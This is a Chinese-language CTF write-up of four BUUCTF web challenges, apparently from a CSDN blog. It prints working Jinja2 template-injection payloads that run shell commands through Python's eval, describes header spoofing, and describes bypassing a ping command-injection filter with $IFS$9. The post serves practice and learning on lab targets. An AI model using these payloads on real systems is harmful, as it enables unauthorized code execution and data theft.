Web-5(17-20)-BUUCTF平臺

本篇內容
[BJDCTF 2nd]fake google
[極客大挑戰 2019]Http
[De1CTF 2019]SSRF Me
[GXYCTF2019]Ping Ping Ping

上一篇 | 目錄 | 下一篇

[BJDCTF 2nd]fake google

在這裏插入圖片描述
直接在搜索框回車,然後右鍵查看源代碼:
在這裏插入圖片描述
嘗試模板注入成功:
在這裏插入圖片描述
直接上手payload看看根路徑下的文件:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('ls /').read()") }}{% endif %}{% endfor %}

在這裏插入圖片描述
看到了flag,cat一下:

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()") }}{% endif %}{% endfor %}

在這裏插入圖片描述





[極客大挑戰 2019]Http

直接右鍵源代碼:
在這裏插入圖片描述
在這裏插入圖片描述
既然要來自https://www.Sycsecret.com,那就在Header信息里加Referer:
在這裏插入圖片描述
要使用Syclover瀏覽器,改:
在這裏插入圖片描述
要本地才能讀,改:
在這裏插入圖片描述
拿到最終flag。





[De1CTF 2019]SSRF Me

本人對這題見解不深刻,講解不好,直接放大佬博客:[De1CTF 2019]SSRF Me之愚見





[GXYCTF2019]Ping Ping Ping

在這裏插入圖片描述
老套路了,直接嘗試:
在這裏插入圖片描述
看到flag.php,嘗試讀取:
在這裏插入圖片描述
嘗試一番後發現,回顯/?ip= 1fxck your symbol!表示出現了非法字符,發現能代替空格的諸如/**/、%0a、${IFS}等都被過濾了,但$IFS$9還可以使用。
在這裏插入圖片描述
在這裏插入圖片描述
右鍵查看源代碼,發現最終flag。
在這裏插入圖片描述





========================================================
上一篇-----------------------------------目錄 -----------------------------------下一篇
========================================================
轉載請註明出處
本文網址:https://blog.csdn.net/hiahiachang/article/details/105431422
========================================================

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章